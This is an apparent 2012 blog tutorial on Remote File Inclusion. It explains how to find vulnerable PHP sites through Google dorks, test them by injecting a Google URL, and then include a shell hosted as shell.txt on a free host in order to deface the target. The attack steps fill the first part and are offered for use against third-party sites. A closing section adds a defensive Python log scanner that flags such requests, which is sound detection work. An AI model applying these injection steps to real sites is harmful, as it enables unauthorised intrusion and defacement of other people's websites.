Wednesday 25 July 2012

RFI [Remote File Inclusion]



Hello friends, this is Maher Bro again.

Today I'm going to show you how the RFI process goes, step by step :)

#Searching for Vuln. Sites
#Checking if they are Vuln.
#Defacing them :P


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[#]Searching for Vuln. sites:

We can find Vuln. websites by using Google dorks,
which can be found here: RFI DorkS
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[#]Checking if they are Vuln. :
Now, after we search for sites on Google, many sites will show up, but not all of them are Vuln.
So how can we check? :P

After opening the site, check the link. For example, it will be like:

www.tagert.com/index.php?page=ANYTHING

Now, to check the site, we replace "ANYTHING" with "http://www.google.com" :)

So it will be like:

www.tagert.com/index.php?page=http://www.google.com

IF the Google home page shows up, then the website is Vuln. to RFI,
IF not, then find another one :P




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[#]Defacing:

OK, now if we found a Vuln. website, how to deface? o_O

Well, now open any website on any free host and upload your shell as a .txt file,
then replace http://www.google.com with your shell link, so for EXAMPLE it will be:
http://www.yourfreehost.com/shell.txt

www.tagert.com/index.php?page=http://www.yourfreehost.com/shell.txt?

[!]NOTE:- DO NOT FORGET THE '?' at the end of the URL :P :D

Now your shell will show, so deface the site :P
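
Seen from the server side, both requests described above (the http://www.google.com check and the shell.txt? link) leave the same trace in the web access log: a query parameter whose value is a full remote URL. The following is an added example, not part of the original post, that scans log lines for that trace. It assumes combined-format access logs; the function names are hypothetical and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A parameter value that starts with a remote URL scheme.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# The request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (client addresses are documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jul/2012:10:01:02 +0000] '
    '"GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Jul/2012:10:03:11 +0000] '
    '"GET /index.php?page=http://www.google.com HTTP/1.1" 200 9421',
    '198.51.100.7 - - [25/Jul/2012:10:04:40 +0000] '
    '"GET /index.php?page=http%3A%2F%2Fwww.yourfreehost.com%2Fshell.txt%3F HTTP/1.1" 200 1337',
]

def remote_include_params(request_target):
    """Return [(param, decoded_value)] for query values that are remote URLs."""
    hits = []
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if REMOTE_URL.match(decoded):
            hits.append((name, decoded))
    return hits

def scan(log_lines):
    """Return [(line_no, param, value, trailing_qmark)] for suspicious requests."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line we understand
        for name, value in remote_include_params(match.group(1)):
            # The trailing '?' from the note above is a strong RFI indicator;
            # a bare URL may also be a legitimate redirect-style parameter.
            findings.append((number, name, value, value.endswith("?")))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the request was made. Whether it worked depends on the application passing the parameter to include and on PHP's allow_url_include setting, which should stay off.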
